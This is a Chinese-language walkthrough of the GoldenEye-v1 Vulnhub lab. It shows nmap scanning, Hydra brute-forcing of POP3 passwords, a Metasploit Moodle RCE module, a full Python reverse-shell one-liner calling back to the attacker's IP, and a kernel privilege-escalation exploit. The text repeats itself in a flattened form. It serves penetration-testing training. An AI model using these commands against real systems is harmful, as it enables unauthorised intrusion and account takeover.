GlodenEye-v1黄金眼靶场复现
字数 1908 2025-08-11 21:26:06

GoldenEye-v1 黄金眼靶场渗透测试教学文档

靶场概述

GoldenEye-v1 是一个中级难度的 Vulnhub 靶场,模拟了一个绝密的苏联军事武器项目系统。该靶场不涉及漏洞利用开发或缓冲区溢出,但包含多种获取root权限所需的技术。

环境准备

初始信息收集

主机发现

nmap -sP 192.168.0.1/24

端口扫描与服务识别

nmap -sS -sV -T5 -A -p- 192.168.0.164

扫描结果:

  • 25/tcp open smtp Postfix smtpd
  • 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  • 55006/tcp open ssl/pop3 Dovecot pop3d
  • 55007/tcp open pop3 Dovecot pop3d

Web应用渗透

初始访问

  1. 访问 http://192.168.0.164 重定向到 /sev-home/ 登录页面
  2. 尝试弱密码(admin/admin, admin123, test123)失败
  3. 检查页面源码发现可疑JS文件

密码破解

  1. 在JS文件中发现HTML注释的编码密码
  2. 解码得到密码: InvincibleHack3r
  3. 从源码中发现两个用户名: Boris和Natalya
  4. 成功登录: boris/InvincibleHack3r

登录后获得提示:

  • 系统为GoldenEye绝密军事项目
  • 提到需要联系GNO主管获取管理员权限
  • 提示POP3服务运行在非默认高端口(55007)

POP3服务渗透

POP3协议基础

  • 邮局协议版本3,用于从服务器下载邮件
  • 默认下载后服务器删除邮件,但多数服务器会保留

暴力破解POP3密码

使用Hydra工具:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt pop3://192.168.0.164:55007

成功破解:

  • natalya/bird
  • boris/secret1!

通过Netcat访问POP3

nc 192.168.0.164 55007

POP3命令:

  • USER <username>
  • PASS <password>
  • STAT (查看邮件数量和大小)
  • RETR <uid> (查看具体邮件内容)

从邮件中发现:

  • 内部域名: severnaya-station.com/gnocertdir
  • 新凭证: xenia/RCP90rulez!

Moodle系统渗透

访问内部系统

  1. 修改/etc/hosts添加DNS解析: 
    192.168.0.164 severnaya-station.com
  2. 访问 http://severnaya-station.com/gnocertdir 发现Moodle系统

凭证枚举

  1. 使用 xenia/RCP90rulez! 登录
  2. 发现新用户名: doak
  3. 爆破得到: doak/goat
  4. 继续登录发现: dr_doak/4England!

管理员权限获取

  1. 在系统中发现JPG图片
  2. 使用strings命令分析图片: 
    strings image.jpg
  3. 发现base64编码字符串: eFdpbnRlcjE5OTV4IQ==
  4. 解码得到: xWinter1995x!
  5. 成功以admin/xWinter1995x!登录管理员后台

获取Shell

方法一: 通过Moodle漏洞利用

  1. 修改TinyMCE HTML编辑器配置:
    • 路径: Home / Site administration / Plugins / Text editors / TinyMCE HTML editor
    • 将Spell engine改为PspellShell
  2. 使用MSF模块利用漏洞: 
    use exploit/unix/webapp/moodle_cerberus_rce
set username admin
set password xWinter1995x!
set rhosts severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 192.168.0.136
exploit
  3. 获取交互式shell: 
    python3 -c 'import pty; pty.spawn("/bin/bash")'

方法二: 通过Payload反弹Shell

  1. 在博客功能中添加新条目:
    • 路径: Home / My profile / Blogs / Add a new entry
  2. 使用Python反弹shell payload: 
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.136",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  3. 攻击机开启监听: 
    nc -lvnp 6666
  4. 点击"Toggle spellchecker"触发payload

权限提升

内核漏洞利用

  1. 检查内核版本:

    uname -a

    发现Linux 3.13.0

  2. 搜索可用漏洞:

    searchsploit 3.13.0

    找到CVE-2015-1328 (37292.c)

  3. 编译并执行提权代码:

    • 修改gcc为cc(靶机无gcc)
    • 编译: 
      cc -o exp 37292.c
    • 执行: 
      chmod +x exp
./exp

总结

本靶场渗透路径:

  1. Web应用源码分析获取初始凭证
  2. POP3服务暴力破解获取更多凭证
  3. 通过邮件信息发现内部系统
  4. Moodle系统中信息收集获取管理员权限
  5. 利用Moodle漏洞获取shell
  6. 内核提权获取root权限

关键学习点:

  • 源码分析能力
  • 服务暴力破解技巧
  • 信息收集与关联分析
  • 漏洞利用链构建
  • 权限提升方法
GoldenEye-v1 黄金眼靶场渗透测试教学文档 靶场概述 GoldenEye-v1 是一个中级难度的 Vulnhub 靶场,模拟了一个绝密的苏联军事武器项目系统。该靶场不涉及漏洞利用开发或缓冲区溢出,但包含多种获取root权限所需的技术。 环境准备 靶机下载地址: https://www.vulnhub.com/entry/goldeneye-1,240/ 网络配置: VMware NAT模式 靶机IP: 192.168.0.164 攻击机(Kali)IP: 192.168.0.136 初始信息收集 主机发现 端口扫描与服务识别 扫描结果: 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 55006/tcp open ssl/pop3 Dovecot pop3d 55007/tcp open pop3 Dovecot pop3d Web应用渗透 初始访问 访问 http://192.168.0.164 重定向到 /sev-home/ 登录页面 尝试弱密码(admin/admin, admin123, test123)失败 检查页面源码发现可疑JS文件 密码破解 在JS文件中发现HTML注释的编码密码 解码得到密码: InvincibleHack3r 从源码中发现两个用户名: Boris和Natalya 成功登录: boris/InvincibleHack3r 登录后获得提示: 系统为GoldenEye绝密军事项目 提到需要联系GNO主管获取管理员权限 提示POP3服务运行在非默认高端口(55007) POP3服务渗透 POP3协议基础 邮局协议版本3,用于从服务器下载邮件 默认下载后服务器删除邮件,但多数服务器会保留 暴力破解POP3密码 使用Hydra工具: 成功破解: natalya/bird boris/secret1 ! 通过Netcat访问POP3 POP3命令: USER <username> PASS <password> STAT (查看邮件数量和大小) RETR <uid> (查看具体邮件内容) 从邮件中发现: 内部域名: severnaya-station.com/gnocertdir 新凭证: xenia/RCP90rulez ! Moodle系统渗透 访问内部系统 修改/etc/hosts添加DNS解析: 访问 http://severnaya-station.com/gnocertdir 发现Moodle系统 凭证枚举 使用 xenia/RCP90rulez! 登录 发现新用户名: doak 爆破得到: doak/goat 继续登录发现: dr_ doak/4England ! 管理员权限获取 在系统中发现JPG图片 使用strings命令分析图片: 发现base64编码字符串: eFdpbnRlcjE5OTV4IQ== 解码得到: xWinter1995x! 成功以admin/xWinter1995x !登录管理员后台 获取Shell 方法一: 通过Moodle漏洞利用 修改TinyMCE HTML编辑器配置: 路径: Home / Site administration / Plugins / Text editors / TinyMCE HTML editor 将Spell engine改为PspellShell 使用MSF模块利用漏洞: 获取交互式shell: 方法二: 通过Payload反弹Shell 在博客功能中添加新条目: 路径: Home / My profile / Blogs / Add a new entry 使用Python反弹shell payload: 攻击机开启监听: 点击"Toggle spellchecker"触发payload 权限提升 内核漏洞利用 检查内核版本: 发现Linux 3.13.0 搜索可用漏洞: 找到CVE-2015-1328 (37292.c) 编译并执行提权代码: 修改gcc为cc(靶机无gcc) 编译: 执行: 总结 本靶场渗透路径: Web应用源码分析获取初始凭证 POP3服务暴力破解获取更多凭证 通过邮件信息发现内部系统 Moodle系统中信息收集获取管理员权限 利用Moodle漏洞获取shell 内核提权获取root权限 关键学习点: 源码分析能力 服务暴力破解技巧 信息收集与关联分析 漏洞利用链构建 权限提升方法